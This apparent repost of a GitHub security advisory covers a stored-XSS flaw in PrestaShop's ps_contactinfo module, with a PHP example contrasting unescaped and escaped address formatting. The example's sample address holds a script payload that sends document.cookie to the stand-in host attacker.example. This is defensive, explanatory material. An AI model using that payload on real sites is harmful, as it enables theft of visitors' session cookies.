Security Headlines

GHSA-35pq-7pv2-2rfw: ps_contactinfo has a potential XSS due to usage of the nofilter tag in template

Impact

This cannot be exploited on a fresh install of PrestaShop; only shops that have already been made vulnerable by third-party modules are concerned.

For example, if your shop has a third-party module vulnerable to SQL injection, an attacker can use it to write a payload into address data stored in the database, and ps_contactinfo might then render that payload as a stored XSS in the front office (FO).

Patches

The long-term fix is to keep all your modules maintained and updated. The fix in ps_contactinfo (all versions up to and including 3.3.2 are affected) keeps formatted addresses from displaying an XSS payload stored in the database, so the value is no longer rendered unfiltered by the template.
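The Impact and Patches paragraphs above describe a two-step chain: a SQL injection in some other module writes a payload into an address field, and ps_contactinfo's template then emits the formatted address with Smarty's `nofilter`, so the payload reaches the front office as live HTML. The PHP below is an added illustration, not code from ps_contactinfo or PrestaShop and not the project's actual patch. It shows why a formatted address tempts a developer into `nofilter` in the first place (the value legitimately contains `<br>` separators that must not be escaped) and the pattern that removes the risk (escape every stored fragment, then add only the markup you control). The address row, the `<br>`-joined formatting and the Smarty line quoted in the comments are assumptions made for this example.

```php
<?php
declare(strict_types=1);

// Added example, not code from ps_contactinfo or PrestaShop.
// Assumptions: the address row below is constructed; the "<br>"-joined
// formatting is a simplification of PrestaShop's address formatter; the
// Smarty line quoted in a comment only illustrates the template shape.

/** Constructed ps_address-style row; address1 holds a payload written via SQLi. */
const TAINTED_ADDRESS = [
    'company'  => 'Example Shop',
    'address1' => '12 rue <script>fetch("https://attacker.example/?c="+document.cookie)</script>',
    'address2' => '',
    'postcode' => '75001',
    'city'     => 'Paris',
];

/** Non-empty address lines in display order (address2 is dropped when blank). */
function addressLines(array $row): array
{
    return array_values(array_filter([
        $row['company'],
        $row['address1'],
        $row['address2'],
        trim($row['postcode'] . ' ' . $row['city']),
    ], static fn (string $line): bool => $line !== ''));
}

/** What a template using `{$contact_infos.address.formatted nofilter}` receives. */
function formatAddressRaw(array $row): string
{
    // Fields are joined with markup, so the template must switch escaping off,
    // and whatever was stored in the row hits the browser as HTML.
    return implode('<br>', addressLines($row));
}

/** Hardened: escape every stored fragment first, then add the <br> you control. */
function formatAddressEscaped(array $row): string
{
    $escaped = array_map(
        static fn (string $line): string => htmlspecialchars($line, ENT_QUOTES | ENT_HTML5, 'UTF-8'),
        addressLines($row)
    );
    // Only the <br> separators are unescaped, and they never came from the
    // database, so this value is safe to emit even through `nofilter`.
    return implode('<br>', $escaped);
}

/** Crude check used here only to show the difference: does an executable tag survive? */
function containsScriptTag(string $html): bool
{
    return stripos($html, '<script') !== false;
}

$raw     = formatAddressRaw(TAINTED_ADDRESS);
$escaped = formatAddressEscaped(TAINTED_ADDRESS);

printf("raw value with nofilter -> script tag reaches browser: %s\n", containsScriptTag($raw) ? 'yes' : 'no');
printf("escaped per line        -> script tag reaches browser: %s\n", containsScriptTag($escaped) ? 'yes' : 'no');
echo $escaped, PHP_EOL;
```

Run it with `php example.php`: the escaped output carries `&lt;script&gt;` as inert text while the raw one carries the tag verbatim. When auditing other modules, grep the templates for `nofilter` and confirm that every variable it is applied to is either assembled from escaped fragments like this or contains no database-sourced text at all.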

Workarounds

None for the module itself. Because the payload must first be written to the database through some other vulnerable module, keeping third-party modules patched removes the precondition, but no configuration change neutralises the template output.

References

none

Source: ghsa
Tags: #sql #xss #vulnerability #web #git

GitHub Advisory Database entry (GitHub Reviewed): CVE-2025-24027

Moderate severity. Published Jan 22, 2025 in PrestaShop/ps_contactinfo. Updated Jan 22, 2025.

Package: prestashop/ps_contactinfo (Composer)

Affected versions: <= 3.3.2


References

  • GHSA-35pq-7pv2-2rfw (GitHub advisory)
  • https://nvd.nist.gov/vuln/detail/CVE-2025-24027 (NVD entry)
  • PrestaShop/ps_contactinfo@d60f9a5 (commit referenced by the advisory)

Published to the GitHub Advisory Database: Jan 22, 2025

Last updated: Jan 22, 2025
